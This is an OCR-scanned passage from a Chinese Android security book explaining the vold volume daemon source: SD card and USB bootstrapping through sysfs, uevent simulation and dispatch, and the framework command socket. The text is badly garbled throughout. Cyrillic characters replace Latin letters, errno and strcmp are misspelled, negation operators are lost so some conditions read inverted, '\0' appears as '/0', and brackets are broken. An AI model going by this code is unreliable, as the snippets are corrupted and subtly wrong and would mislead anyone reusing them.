blkdev t *dev; 

pid t worker pid; 

pthread t worker thread; 

union ( 
struct volmgr start args start args; 
Struct volmgr reaper args reaper args; 

} worker args; 

boolean worker running; 

pthread mutex t worker sem; 

struct volmgr fstable entry *fs; 

struct volume *next; 

) volume t; 


这 样 通过 结构 media paths. media type. media type. mount point, ums path 存储 了 配置 文件 中 的 对 应 值 。 
3. 挂 载 mmc/sdcard 


挂 载 mmc/sdcard 操作 从 文件 system/core/vold/Mme.c 开始 ， 主 要 代码 如 下 所 示 。 
#define SYSFS CLASS MMC PATH "/sys/class/mmc host" 
int mmc bootstrap() 
{ 
DIR *d; 
struct dirent *de; 
if (!(d = opendir(SYSFS CLASS MMC РАТН))) { 
LOG ERROR("Unable to open '%s' (%s)", SYSFS CLASS MMC PATH, 
strerror(ermo)); 
return -ermo; 
} 
while ((de = readdir(d))) { 
char tmp[255]; 
if (de->d_name[0] == '.') 
continue; 
sprintf(tmp, "%s/%s", SYSFS CLASS MMC PATH, de->d_name); 
if (mmc bootstrap controller(tmp)) ( 
LOG ERROR("Error bootstrapping controller '%s' (%s)", tmp, 
Strerror(errno)); 
H 
} 
closedir(d); 
return 0; 
} 
假如 挂 载 的 是 /sys/class/mme_host: 
/sys/class/mmc_host/: mmc0 mmc1 
/sys/class/mmc_host/mmc0/: uevent subsystem device power mmc0:e624 
假如 Mmc0:e624 是 一 个 链接 目录 ， 则 其 真实 路 径 是 : 
/sys/devices/platform/pxa2xx-mci.0/mmc_host/mmc0/mmc0:e624 
/sys/devices/platform/pxa2xx-mci.0/mmc_host/mmc0/mmc0:e624/name: SR016 
/sys/devices/platform/pxa2xx-mci.0/mmc_host/mmc0/mmc0:e624/type:SD 
Isysldevices/platform/pxa2xx-mci.0/mmc host/mmcO0/mmc0:e624/block/:mmcbIkO 
Isysldevices/platform/pxa2xx-mci.0/mmc host/mmc0/mmc0:e624/block/mmcblk0/: 
uevent dev subsystem device range ext range removable ro size capability 


sss xim | 


stat power holders slaves mmcblk0p1 queue bdi 
上 述 过 程 的 功能 是 扫描 /sys/class/mmec hos. 目录 下 的 所 有 文件 和 文件 夹 ， 然 后 依次 将 其 路 径 传 入 到 
mmc_bootstrap_controller 中 ， 并 且 会 先 把 /sys/class/mmc_host/mmc0 传 给 函数 mmc_bootstrap_controller()， 具 


体 代 码 如 下 所 示 。 
static int mmc_bootstrap_controller(char *sysfs_path) 
( 
DIR *d; 
struct dirent *de; 
#if DEBUG_BOOTSTRAP 
LOG VOL('bootstrap controller(?6s):", sysfs_path); 
#endif 
if (!(d = opendir(sysfs path))) { 
LOG_ERROR("Unable to open '%s' (%s)", sysfs_path, strerror(ermo)); 
return -еггпо; 
} 
while ((de = readdir(d))) { 
char tmp[255]; 
if (de->d_name[0] == '.') 
continue; 
if ((Istremp(de-»d name, "uevent")) || 
(!ѕігстр(де->а пате, "subsystem")) || 
(!ѕігстр(де->а пате, "device")) || 
(!ѕігстр(де->а пате, "power"))) { 
continue; 
} 
sprintf(tmp, "%s/%s", sysfs_path, de->d_name); 
if (mmc bootstrap card(tmp) < 0) 
LOG ERROR("Error bootstrapping card '%s' (%5)", tmp, strerror(errno)); 
)// while 
closedir(d); 
return 0; 
} 
接着 上 面 的 举例 ， 接 下 来 会 继续 扫描 传 进来 的 路 径 ， 将 文件 名 不 在 fuevent,subsystem,device,power} 内 的 
文件 或 文件 夹 传 给 mmc_bootstrap_card。 按 照 上 述 举例 ， 会 先 把 /sysclass/mmc_hostmmc0/ mmc0:e624 传 给 
下 面 的 函数 。 
static int mmc_bootstrap_card(char *sysfs_path) 
{ 
char saved cwd[255]; 
char new cwd[255]; 
char *devpath; 
char *uevent params[4]; 
char *p; 
char filename[255]; 
char tmp[255]; 
ssize t sz; 
#if DEBUG BOOTSTRAP 
LOG_VOL("bootstrap_card(%s):", sysfs path); 
#endif 
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* sysfs path is based on /sys/class, but we want the actual device class 
Wi 
if (Igetcwd(saved сма, sizeof(saved cwd))) { 
LOGE("Error getting working dir path"); 


return -errno; 
} 
if (chdir(sysfs_path) < 0) { 
LOGE("Unable to chdir to %s (%s)", sysfs_path, strerror(errno)); 
return -ermo; 
} 


if (Igetewd(new сма, sizeof(new cwd))) ( 
LOGE("Buffer too small for device path"); 
return -errno; 

} 

if (chdir(saved_cwd) < 0) ( 
LOGE("Unable to restore working dir"); 
return -errno; 

E 

devpath = &new cwd[4]; // Skip over '/sys' 

n 

* Collect parameters so we can simulate a UEVENT 
7 

sprintf(tmp, "DEVPATH=%s", devpath); 

uevent params[0] = (char *) strdup(tmp); 

sprintf(filename, "/sys%s/type", devpath); 

p 7 read file(filename, &sz); 

p[strlen(p) - 1] = '/0*; 

sprintf(tmp, "MMC_TYPE=%s", p); 

free(p); 

uevent params[1] = (char *) strdup(tmp); 

sprintf(filename, "/sys%s/name", devpath); 

p 7 read file(filename, &sz); 

p[strlen(p) - 1] = '/0'; 

sprintf(tmp, "MMC_NAME=%s", р); 

free(p); 

uevent params[2] = (char *) strdup(tmp); 

uevent params[3] = (char *) NULL; 

if (simulate uevent("mmc'", devpath, "add", uevent params) < 0) { 
LOGE("Error simulating uevent (%s)", strerror(errno)); 
return -errno; 


* Check for block drivers 
ч 
char block devpath[255]; 
sprintf(tmp, "%s/block", devpath); 
sprintf(filename, "/sys%s/block", devpath); 
if (laccess(filename, F_OK)) { 
if (mmc_bootstrap_block(tmp)) { 
LOGE("Error bootstrapping block @ %s", tmp); 
} 
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} 
return 0; 
} 
因为 sysfs path 是 一 个 链接 路 径 ,所 以 需要 用 Chdir 和 Getewd 来 获取 其 真实 路 径 。. 在 上 述 代 码 中 ,Getcwd 
用 于 获取 当前 路 径 ，Chdir 用 于 更 改 路 径 。 
根据 上 述 举例 ， 最 终 获得 的 真实 路 径 是 : 
/sys/devices/platform/pxa2xx-mci.0/mmc_host/mmc0/mmc0:e624 
所 以 DEVPATH 的 值 是 /devices/platform/pxa2xx-mci.0/mmc_hostmmc0/mmc0:e624， 而 这 个 值 也 就 是 在 
配置 文件 vold.conf 中 media path 的 路 径 。media_path 的 路 径 必须 与 DEVPATH 相同 ,否则 不 会 加 载 SD F. 
下 面 的 3 个 参数 会 被 作为 uevent 的 参数 。 
DEVPATH = /devices/platform/pxa2xx-mci.0/mmc host/mmc0/mmc0:e624 
MMC TYPE-SD 
MMC NAME- SR016 
上 述 参数 会 虚拟 产生 一 个 add 事件 。 
simulate_uevent("mmc", devpath, "add", uevent_params); 
然后 将 路 径 /devices/platform/pxa2xx-mci.0/mmc_hostmmc0/mme0:e624/block 通过 函数 mme_bootstrap_block() 
传递 给 mmc_bootstrap_block， 具 体 代码 如 下 所 示 。 
static int mmc_bootstrap_block(char *devpath) 
{ 
char blockdir_path[255]; 
DIR *d; 
struct dirent *de; 
#if DEBUG BOOTSTRAP 
LOG VOL("mmc bootstrap block(?6s);", devpath); 
#endif 
sprintf(blockdir_path, "/sys%s", devpath); 
if (Ка = opendir(blockdir_path))) ( 
LOGE("Failed to opendir %s", devpath); 


return -ermo; 
} 
while ((de = readdir(d))) { 
char tmp[255]; 
if (de->d_name[0] == '.') 
continue; 
sprintf(tmp, "%s/%s", devpath, de->d_name); 
if (mmc bootstrap mmcblk(tmp)) 
LOGE("Error bootstraping mmcblk @ 96s", tmp); 
} 
closedir(d); 
return 0; 


) 
接 下 来 会 扫描 所 有 的 文件 或 目录 ， 将 路 径 传 给 mmc bootstrap mmcblk。 以 前 面 的 举例 路 径 为 例 ， 会 


/sys/devices/platform/pxa2xx-mci.0/mmc_host/mmc0/mmc0:e624/block/mmcblk0/ 传 给 下 面 的 mmc bootstrap mmcblk() 
函数 ， 具 体 代码 如 下 所 示 。 

static int mmc_bootstrap_mmcblk(char *devpath) 

{ 


char *mmcblk_devname; 
int part_no; 
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int rc; 


sif DEBUG BOOTSTRAP 


LOG VOL("mmc bootstrap mmcblk(96s):", devpath); 


#endif 


) 


if (гс = mmc bootstrap mmcblk partition(devpath))) { 
LOGE("Error bootstrapping mmcblk partition '%s", devpath); 
return rc; 
} 
for (mmcblk devname = &devpath[strlen(devpath)]; 
*mmcblk_devname != '/; mmcblk_devname--); 
mmcblk devname++; 
for (part no = 0; part no < 4; part no++) ( 
char part file[255]; 
sprintf(part file, "/sys%s/%sp%d", devpath, mmcblk devname, part no); 
if (laccess(part file, F_OK)) { 
char part_devpath[255]; 
sprintf(part_devpath, "%s/%sp%d", devpath, mmcblk_devname, part_no); 
if (mmc_bootstrap_mmcblk_partition(part_devpath)) 
LOGE("Error bootstrapping mmcblk partition '%s", part_devpath); 
} 
} 


return 0; 


在 上 述 代码 中 , 函数 mmc_bootstrap_mmcblk_partition() 的 功能 是 读 取 当前 路 径 下 的 uevent 文件 中 的 如 下 
4 个 参数 : 


о 
о 
о 
о 


DEVPATH 
DEVTYPE 
MAJOR 
MINOR 


读 取 参 数 工 作 完毕 后 ， 将 这 4 个 参数 作为 uevent 参数 产生 一 个 uevent 事件 。 
simulate_uevent("block", devpath, "add", uevent_params); 


由 此 可 见 ， 上 述 代码 的 功能 如 下 所 示 。 


口 


口 


Н] /sys/devices/platform/pxa2xx-mci.0/mmc host/mmc0/mmc0:e624/block/mmcbIk0/uevent Ф [I] 22 7 
生 一 个 uevent 事 件 。 
如 果 存 在 下 面 的 路 径 ， 则 读 取 目录 下 的 uevent 文 件 ， 并 产生 一 个 uevent 事 件 。 


Isysldevices/platform/pxa2xx-mci.0/mmc host/mmcO0/mmc0:e624/block/mmcbIk0/mmcbIkOpO 
Isysldevices/platform/pxa2xx-mci.0/mmc host/mmc0/mmc0:e624/block/mmcbIk0/mmcbIk0p1 
Isysldevices/platform/pxa2xx-mci.0/mmc host/mmc0/mmc0:e624/block/mmcbIk0/mmcbIk0p2 
Isysídevices/platform/pxa2xx-mci.0/mmc host/mmc0/mmc0:e624/block/mmcblIk0/mmcbIk0p3 
由 此 可 见 ， 上 述 加 载 功能 会 产生 3 个 事件 ， 第 1 个 为 : 
devpath=/devices/platform/pxa2xx-mci.0/mmc_host/mmc0/mmc0:e624 

simulate uevent("mmc", devpath, "add", uevent params); 

第 2 个 为 : 
devpath=/devices/platform/pxa2xx-mci.0/mmc_host/mmc0/mmc0:e624/block/mmcbIk0/ 
simulate uevent("block", devpath, "add", uevent_params); 

第 3 个 为 : 
devpath=/devices/platform/pxa2xx-mci.0/mmc_host/mmc0/mmc0:e624/block/mmcblk0/mmcblk0p1 
simulate_uevent("block", devpath, "add", uevent_params); 


(mo, 


第 6 章 


4. 连接 USB 


连接 USB 功能 在 文件 system/core/vold/Switch.c 中 实现 ， 主 要 代码 如 下 所 示 。 
#define SYSFS_CLASS SWITCH_PATH "/sys/class/switch" 
int switch_bootstrap() 
{ 
DIR *d; 
struct dirent *de; 
if ((d = opendir(SYSFS CLASS SWITCH РАТН))) { 
LOG ERROR("Unable to open '%s' (%s)", SYSFS CLASS SWITCH PATH, 
strerror(ermo)); 
return -ermo; 
} 
while ((de = readdir(d))) { 
char tmp[255]; 
if (de->d_name[0] == '.') 
continue; 
sprintf(tmp, "%s/%s", SYSFS CLASS SWITCH PATH, de->d_name); 
if (mmc bootstrap switch(tmp)) ( 
LOG ERROR("Error bootstrapping switch '%s' (%s)", tmp, 
strerror(errno)); 
Ч 
} 
closedir(d); 
return 0; 
} 

上 述 代码 会 扫描 路 径 /sys/class/switch 下 的 文件 和 目录 ， 并 将 扫描 路 径 传 给 函数 mmc_bootstrap_switch(). 
在 接 下 来 的 内 容 中 ， 以 扫描 /sys/class/switch 目录 为 例 来 说 明 连接 USB 的 过 程 。 
首先 通过 如 下 代码 分 别 将 路 径 /sys/class/switch/micco_hsdetect 和 /sys/class/switch/usb_mass_storage 传递 

给 函数 mme, bootstrap switch(). 
/sys/class/switch/ 
micco_hsdetect 
usb_mass_storage 
/sys/class/switch/ usb mass storage/ 
uevent 
subsystem 
power 
state 
name 
/sys/class/switch/ usb mass storage/name:usb mass storage 
/sys/devices/virtual/switch/ 
micco_hsdetect 
usb_mass_storage 
/sys/devices/virtual/switch/usb_mass_storage 
uevent 
subsystem 
power 
state 
name 
/sys/devices/virtual/switch/usb_mass_storage/state:online 


Android 系统 安全 和 反 编 译 实战 


函数 mme_bootstrap_switch0) 的 具体 实现 代码 如 下 所 示 。 
static int mmc bootstrap switch(char *sysfs_path) 
{ 
#if DEBUG_BOOTSTRAP 

LOG_VOL("bootstrap_switch(%s):", sysfs_path); 
#endif 

char filename[255]; 

char name[255]; 

char state[255]; 

char tmp[255]; 

char *uevent params[3]; 

char devpath[255]; 

FILE *fp; 

n 

* Read switch name 
*/ 
sprintf(filename, "%s/name", sysfs_path); 
if (!(fp = fopen(filename, "r"))) { 
LOGE("Error opening switch name path '%s' (%s)", 
sysfs_path, strerror(errno)); 
return -errno; 
} 
if (Ifgets(name, sizeof(name), fp)) { 
LOGE("Unable to read switch name"); 


fclose(fp); 
return -EIO; 
} 
fclose(fp); 


namef[strlen(name) -1] = '/0'; 
sprintf(devpath, "/devices/virtual/switch/%s", name); 
sprintf(tmp, "SWITCH_NAME=%s", name); 
uevent_params[0] = (char *) strdup(tmp); 
六 
* Read switch state 
*/ 
sprintf(filename, "%s/state", sysfs_path); 
if (!(fp = fopen(filename, "r"))) { 
LOGE("Error opening switch state path '%s' (%s)", 
sysfs_path, strerror(errno)); 
return -errno; 
} 
if (!fgets(state, sizeof(state), fp)) ( 
LOGE("Unable to read switch state"); 


fclose(fp); 
return -EIO; 
} 
fclose(fp); 


state[strlen(state) -1] = '/0'; 

sprintf(tmp, "SWITCH_STATE=%s", state); 
uevent params[1] = (char *) strdup(tmp); 
uevent params[2] = (char *) NULL; 
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if (simulate_uevent("switch", devpath, "add", uevent params) < 0) ( 
LOGE("Error simulating uevent (%s)", strerror(errno)); 
return -errno; 


} 


return 0; 


} 

通过 上 述 代 码 来 到 /sys/class/switch/usb_mass_storage 目录 下 并 获取 state 的 值 ,然后 再 作为 uevent 的 参数 
产生 switch 的 uevent 事件 。 

SWITCH NAME-usb mass storage 

SWITCH STATE-online 

devpathz/devices/virtual/switch/usb mass storage 


5. 通信 机 制 


在 接 下 来 的 内 容 中 ， 开 始 讲解 通信 机 制 的 具体 实现 过 程 。 
(1) uevent 事件 
uevent 事件 的 通信 机 制 在 文件 system/core/vold/Uevent.c 中 实现 ， 首 先 通过 函数 simulate_uevent() 产 生 
uevent 事件 ， 具 体 代码 如 下 所 示 。 
int simulate_uevent(char *subsys, char *path, char *action, char **params) 


d 


struct uevent *event; 

char tmp[255]; 

int i, rc; 

if ((event = malloc(sizeof(struct uevent)))) ( 
LOGE("Error allocating memory (%s)", strerror(errno)); 
return -еггпо; 

} 

memset(event, 0, sizeof(struct uevent)); 

event->subsystem = strdup(subsys); 

if (Istremp(action, "add")) 
event->action = action add; 

else if (Istremp(action, "change")) 
event->action = action change; 

else if (Istremp(action, "remove")) 
event->action = action remove; 

else ( 
LOGE("Invalid action '%s'", action); 
return -1; 

} 

event->path = strdup(path); 

for (i = 0; i < UEVENT PARAMS МАХ; i++) { 
if (Iparams[i]) 

break; 

event-»param[i] = strdup(params[i]); 

} 

гс = dispatch_uevent(event); 

free_uevent(event); 

return rc; 
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例如 : 
devpath = "/devices/platform/pxa2xx-mci.0/mmc_host/mmc0/mmc0:e624" 
uevent params [0] = "MMC TYPE-SD" 
uevent params [1] = "MMC NAME- SR016" 
simulate uevent("mmc'", devpath, "add", uevent params); 
则 经 过 simulate uevent 处 理 后 会 被 打包 成 : 
event->subsystem = "mmc" 
event->action = action add; 
event-»path = "/devices/platform/pxa2xx-mci.0/mmc_host/mmc0/mmc0:e624" 
event->param[0] = "MMC TYPE-SD" 
event->param[1] = "MMC_NAME=SR016" 
将 打包 结果 发 给 dispatch_uevent 后 开始 分 配 uevent 事件 ， 对 应 的 代码 如 下 所 示 。 
static struct uevent_dispatch dispatch_table[ ] = ( 
( "switch", handle switch event ), 
( "battery", handle battery event }, 
{ "mmc", handle mmc event }, 
( "block", handle block event ), 
{ "bdi", handle Баі event }, 
("power supply", handle powersupply event ), 
( NULL, NULL ) 
X 
static int dispatch uevent(struct uevent *event) 
( 
int i; 
#if DEBUG_UEVENT 
dump_uevent(event); 
#endif 
for (i = 0; dispatch table[i].subsystem != NULL; i++) ( 
if (Istremp(dispatch table[i]J.subsystem, event->subsystem)) 
return dispatch table[i].dispatch(event); 
) 
#if DEBUG_UEVENT 
LOG VOL("No uevent handlers registered for '%s' subsystem", event->subsystem); 
#endif 
return 0; 


} 
在 上 述 代码 中 ， 根 据 subsystem 的 类 型 进行 分 配 ， 如 果 event->subsystem = "mmc"， 则 分 配 到 handle - 
- event 并 进行 处 理 。 
接 下 来 开始 处 理 uevent 事件 ， 以 mme 加 载 事件 为 例 来 挂 载 mmc/sdcard 中 的 “simulate_uevent("mmec'"， 
ath, "add", uevent_params);”。 处 理 函 数 handle ттс еуепі) 3 system\core\vold\uevent.c 中 定义 ， 具 
码 如 下 所 示 。 
static int handle mmc event(struct uevent *event) 
{ 
if (event->action == action_add) { 

media_t *media; 

char serial[80]; 

char *type; 

F 

* Pull card information from sysfs 
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En 
type = get uevent param(event, "MMC TYPE"); 
if (stremp(type, "SD") && strcmp(type, "MMC")) 
return 0; 
read ѕуѕїѕ var(serial, sizeof(serial), event->path, "serial"); 
if (media = media create(event-»path, 
get uevent param(event, "MMC NAME"), 
serial, 
media mmo))) ( 
LOGE("Unable to allocate new media (%s)", strerror(errno)); 
retum -1; 
} 
LOGI("New ММС сага '%s' (serial %u) added @ %s", media->name, 
media->serial, media->devpath); 


} 
return 0; 
) 
然后 通过 文件 system/core/vold/Media.c 中 函数 media create 将 devpath, name, serial 和 media type 等 信 
息 以 media 结构 打包 放 到 list root 链表 中 。 具 体 代码 如 下 所 示 。 
media t *media create(char *devpath, char *name, char “serial, media type t type) 
i 
media list t*list entry; 
media t *new; 
if ((new = malloc(sizeof(media t)))) 
return NULL; 
memset(new, 0, sizeof(media t)); 
if (10115 entry = malloc(sizeof(media list t)))) { 
free(new); 
return NULL; 
) 
list entry-2media = new; 
list епігу->пех = NULL; 
if (list root) 
list root = list entry; 
else { 
media list t*list scan = list root; 
while(list_scan->next) 
list_scan = list_scan->next; 
list_scan->next = list_entry; 
} 
new->devpath = strdup(devpath); 
new->name = strdup(name); 
if (!serial) 
new->serial = 0; 
else 
new->serial = strtoul(serial, NULL, 0); 
new->media_type = type; 
return new; 
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开始 处 理 前 面 的 举例 挂 载 mmc/sdcard>> 中 的 simulate uevent("block", devpath, "add", uevent_params). [A] 
为 有 两 个 block 的 事件 对 应 着 两 个 目录 ， 所 以 有 两 个 参数 disk 和 partition， 处 理 函 数 handle_block_event()7E 
文件 system/core/vold/uevent.c 中 定义 ， 具 体 代码 如 下 所 示 。 

static int handle block event(struct uevent *event) 

t 

char mediapath[255]; 

media t *media; 

int n; 

int maj, min; 

blkdev t *blkdev; 

char *nmcblk devname; 

n 

* Look for backing media for this block device 
2 
if (IStmmcmp(get uevent param(event, "DEVPATH"), 
"Idevices/virtual/", 
strlen("/devices/virtual/"))) ( 

n=0; 

} else if (Istremp(get uevent param(event, "DEVTYPE"), "disk")) 
n=2; 

else if (Istremp(get uevent param(event, "DEVTYPE"), "partition")) 
nz3; 

else( 
LOGE("Bad blockdev type '%s", get uevent param(event, "DEVTYPE")); 
retum -EINVAL; 

) 

truncate sysfs path(event-»path, n, mediapath, sizeof(mediapath)); 

LOGE("PATH- '%s',n=%d,mediapth = %s",event->path, n, mediapath); 

if ((media = media lookup by path(mediapath, false))) { 

#if DEBUG UEVENT 

LOG VOL("No backend media found @ device path '%s'", mediapath); 
#endif 
return 0; 
) 
maj = atoi(get uevent param(event, "MAJOR")); 
min = atoi(get uevent param(event, "MINOR")); 
if (event->action == action add) ( 
blkdev t *disk; 
n 
* If there isn't a disk already its because *we* 
* are the disk 
ol 
if (media->media_type == media_mmc) 
disk = blkdev_lookup_by_devno(maj, ALIGN_MMC_MINOR(min)); 
else 
disk = blkdev_lookup_by_devno(maj, 0); 


if (\(blkdev = blkdev create(disk, 
event->path, 
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maj, 
min, 
media, 
get uevent param(event, "DEVTYPE")))) { 
LOGE("Unable to allocate new blkdev (%s)", strerror(errno)); 
return -1; 
} 
blkdev refresh(blkdev); 
n 
* Add the blkdev to media 
s 
int rc; 
if ((rc = media add blkdev(media, blkdev)) < 0) ( 
LOGE("Unable to add blkdev to card (%d)", rc); 
return rc; 
3 
LOGI("New blkdev %d.%d on media %s, media path 96s, Орр %d", 
blkdev->major, blkdev-»minor, media->name, mediapath, 
blkdev get num pending partitions(blkdev-»disk)); 
if(blkdev get num pending partitions(blkdev-»disk) == 0) ( 
if ((rc = volmgr consider disk(blkdev-»disk)) < 0) ( 
if (rc == -EBUSY) ( 
LOGI("Volmgr not ready to handle device"); 


}else { 
LOGE("Volmgr failed to handle device (%d)", rc); 
return rc; 
} 
} 
} 
} 
return 0; 
} 


在 上 述 代 码 中 truncate_sysfs_path 的 功能 是 处 理 后 面 的 n 个 目录 ， 以 获得 如 下 所 示 的 最 终 路 径 。 

/devices/platform/pxa2xx-mci.0/mmc_host/mmc0/mmc0:e624 

blkdev create 的 功能 是 将 major、minor、media 等 参数 组 成 一 个 blkdev 然 后 返回 blkdev。media_add_blkdev 
的 功能 是 将 blkdev 添加 到 list root 列表 中 media lookup by path 的 功能 是 与 media create 创建 后 的 
media path 进行 比较 , 确认 是 否 一 致 。volmgr_consider_disk 的 功能 是 比较 list root 的 media path 和 vol root 
的 media_path 行 ， 以 确认 两 者 是 否 一 致 。 

通过 文件 systenvcore/vold/volmgr.c 中 的 函数 volmgr_consider_disk() 比 较 stmcmp(media_path, scan)->media_ 
paths[i], strlen(scan->media_paths[ 订 )， 具 体 代码 如 下 所 示 。 

int volmgr consider disk(blkdev t*dev) 


{ 

volume_t *vol; 

if ((vol = volmgr_lookup_volume_by_mediapath(dev->media->devpath, true))) 
{ 
LOGE('volmgr consider disk:LOOKUP FAILED"); 


return 0; 
) 
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} 
static volume t *volmgr_lookup_volume_by_mediapath(char *media path, boolean fuzzy) 
t 
volume t *scan - vol root; 
int i; 
while (scan) ( 
for (i = 0; i < VOLMGR MAX MEDIAPATHS PER VOLUME; i++) { 
if (Iscan-»media paths[i]) 
continue; 
if (fuzzy && Istmcmp(media path, scan->media_paths[i], strlen(scan->media_paths[i]))) 
return scan; 
else if (!fuzzy && Istremp(media path, scan-» media paths[i])) 
return scan; 
} 
scan = scan->next; 
) 
return NULL; 
) 
通过 上 述 代码 ， 以 vol root 的 media path 的 长 度 来 比较 media path 的 路 径 是 否 与 devpath 一 致 。 假 如 
media path 的 值 是 /devices/platform/pxa2xx-mci.0/mmc_hosbymmcO/mmec0:e624， 则 可 以 将 vold.conf 文件 中 的 
media_path 路 径 设置 为 下 面 的 选项 之 一 。 
Idevices/platform/pxa2xx-mci.0/mmc_host/mmc0/mmc0:e624 
Idevices/platform/pxa2xx-mci.0/mmc_host/mmc0/ 
/devices/platform/pxa2xx-mci.0/mmc_host/ 
/devices/platform/pxa2xx-mci.0/ 
/devices/platform/ 
/devices/ 
(2) 命令 处 理 
在 文件 system/core/vold/Vold.c 中 通过 函数 send_msg() 发 送 命令 ， 将 消息 写 到 sock 文件 中 ， 有 具体 代码 如 
ИД 
int send msg(char* message) 
í 
int result = -1; 
pthread mutex lock(&write mutex); 
Il LOG VOL("send msg(%s):", message); 
if (fw sock >= 0) 
result = write(fw sock, message, strlen(message) + 1); 
pthread mutex unlock(&write mutex); 
return result; 
} 
int send_msg_with_data(char *message, char *data) 
{ 
int result = -1; 
char* buffer = (char *)alloca(strlen(message) + strlen(data) + 1); 
if (Ibuffer) ( 
LOGE("alloca failed in send msg with data"); 
retum -1; 
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strcpy(buffer, message); 
strcat(buffer, data); 
return send_msg(buffer); 
} 
{ЕХ {Ё system/core/vold/Cmd_dispatch.c 中 通过 函数 process_framework_command() 接 收 命令 , 读 取 socket 
文件 中 的 数据 后 分 配 数据 所 代表 的 命令 ， 具 体 代 码 如 下 所 示 。 
int process framework command(int socket) 
{ 
int rc; 
char buffer[101]; 
if ((rc = read(socket, buffer, sizeof(buffer) -1)) < 0) ( 
LOGE("Unable to read framework command (%s)", strerror(ermo)); 
return -еггпо; 
} else if (Irc) 
return -ECONNRESET; 
int start = 0; 
int i; 
buffer[rc] = 0; 
for (i = 0; i < rc; i++) { 
if (buffer[i] == 0) { 
dispatch_cmd(buffer + start); 
start =i + 1; 
} 
} 
return 0; 
} 
通过 文件 system/core/vold/Cmd dispatch.c 分 配 命令 ， 具 体 代 码 如 下 所 示 。 
#define VOLD_CMD_ENABLE_UMS "enable_ums" 
#define VOLD CMD DISABLE UMS "disable ums" 
#define VOLD CMD SEND UMS STATUS "send ums status" 
// these commands should contain a volume mount point after the colon 
#define VOLD CMD MOUNT VOLUME "mount volume:" 
#define VOLD CMD EJECT MEDIA "eject_media:" 
#define VOLD СМО FORMAT MEDIA "format media:" 
static struct cmd dispatch dispatch table[ ] = ( 
(VOLD CMD ENABLE UMS, do set ums enable }, 
(VOLD CMD DISABLE UMS, do set ums enable}, 
(VOLD CMD SEND UMS STATUS, do send ums status }, 
(VOLD CMD MOUNT VOLUME, do mount volume ), 
(VOLD CMD EJECT MEDIA, do eject media ), 
{VOLD CMD FORMAT MEDIA, do format media }, 
(NULL, NULL ) 
X 
static void dispatch cmd(char *cmd) 
{ 
struct cmd dispatch *c; 
LOG VoOL('dispatch cmd(?6s):", cmd); 
for (c = dispatch table; c->cmd != NULL; c++) { 
if (Istrmemp(c-» cmd, cmd, strlen(c->cmd))) ( 
c-»dispatch(cmd); 
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return; 
} 
} 
LOGE("No cmd handlers defined for '%s", cmd); 
} 
在 上 述 代码 中 , 通过 如 下 命令 格式 将 mount volume 分 配 到 表 dispatch table 中 进行 匹配 ， 以 实现 合适 的 
处 理 。 


mount volume:/sdcard 

在 文件 system/core/vold/Cmd dispatch.c 中 通过 函数 до mount. volume0 处 理 命 令 ， 过 滤 掉 命令 字 后 将 后 
面 的 参数 传递 给 相应 的 处 理 函数 。 有 具体 代码 如 下 所 示 。 

static int do mount volume(char *cmd) 


{ 


return volmgr start volume_by_mountpoint(&cmd[strlen("mount volume:")]); 
) 
(3) socket 处 理 
在 文件 system/core/vold/Vold.c 中 ， 实 现 socket 处 理 服务 的 代码 如 下 所 示 。 
#define VOLD SOCKET "vold" 
nt main(int argc, char **argv) 
{ 
int door sock = -1; 
int uevent sock = -1; 
Struct sockaddr nl nladdr; 
int uevent sz = 64 * 1024; 
LOGI("Android Volume Daemon version %d.%d", ver major, ver minor); 
a 
* Create all the various sockets we'll need 
a) 
11 Socket to listen on for incomming framework connections 
if ((door_sock = android get control socket(VOLD SOCKET)) < 0) { 
LOGE("Obtaining file descriptor socket '%s' failed: %s", 
VOLD_SOCKET, strerror(errno)); 
exit(1); 
} 
if (listen(door sock, 4) < 0) { 
LOGE("Unable to listen on fd '%d' for socket '%s': %s", 
door sock, VOLD SOCKET, strerror(errno)); 
exit(1); 
} 


11 Socket to listen on for uevent changes 
memset(&nladdr, 0, sizeof(nladdr)); 
nladdr.nl family = AF NETLINK; 
nladdr.nl pid = getpid(); 
nladdr.nl groups = Ох; 
if ((uevent sock = socket(PF NETLINK, 
SOCK DGRAM,NETLINK KOBJECT UEVENT)) « 0) ( 
LOGE("Unable to create uevent socket: 96s", strerror(errno)); 
exit(1); 
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if (setsockopt(uevent sock, SOL SOCKET, SO RCVBUFFORCE, &uevent sz, 
sizeof(uevent sz)) < 0) ( 
LOGE("Unable to set uevent socket options: 96s", strerror(errno)); 
exit(1); 
) 
if (bind(uevent_sock, (struct sockaddr *) &nladdr, sizeof(nladdr)) < 0) ( 
LOGE("Unable to bind uevent socket: %s", strerror(errno)); 


exit(1); 
} 
while(1) ( 
fd setread fds; 
struct timeval to; 
int max 7 0; 
int rc = 0; 
to.tv sec = (60 * 60); 
to.tv usec = 0; 


FD ZERO(&read fds); 
FD SET(door sock, &read fds); 
if (door sock > max) 
max = door sock; 
FD SET(uevent sock, &read fds); 
if (uevent sock > max) 
max = uevent sock; 
if (fw sock {= -1) { 
FD SET(fw sock, &read fds); 
if (fw sock > max) 
max = fw sock; 
} 
if ((rc = select(max + 1, &ead fds, NULL, NULL, &to)) < 0) { 
LOGE("select() failed (%s)", strerror(errno)); 


sleep(1); 
continue; 
} 
if (Irc) { 
continue; 
} 
if (FD_ISSET(door_sock, &read_fds)) { 
struct sockaddr addr; 


socklen_t alen; 

alen = sizeof(addr); 

if (fw sock {= -1) { 
LOGE("Dropping duplicate framework connection"); 
int tmp = accept(door_sock, &addr, &alen); 
close(tmp); 
continue; 

} 

if ((fw_sock = accept(door_sock, &addr, &alen)) < 0) { 
LOGE("Unable to accept framework connection (%s)", 

strerror(errno)); 
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LOG VOL("Accepted connection from framework"); 
if ((гс = volmgr send states()) < 0) { 
LOGE("Unable to send volmgr status to framework (%а)", rc); 
} 
} 
if (FD ISSET(fw sock, &read fds)) { 
if ((rc = process framework command(fw sock)) < 0) { 
if (rc == -ECONNRESET) ( 
LOGE("Framework disconnected"); 
close(fw sock); 
fw sock = -1; 
) else ( 
LOGE("Error processing framework command (%s)", 
strerror(errno)); 


} 
} 
if (FD_ISSET(uevent_sock, &read_fds)) { 
if ((rc = process_uevent_message(uevent_sock)) < 0) { 
LOGE("Error processing uevent msg (%s)", ѕігеггог(еггпо)); 
} 
} 
}// while 
) 
在 上 述 代 码 中 有 两 个 socket， 一 个 用 于 接收 和 处 理 vold 命令 的 vold; 一 个 是 用 于 接收 和 处 理 uevent F 
件 的 uevent socket。 其 中 ， 在 文件 frameworks/base/services/java/com/android/server/MountListener.java Чї, 10 
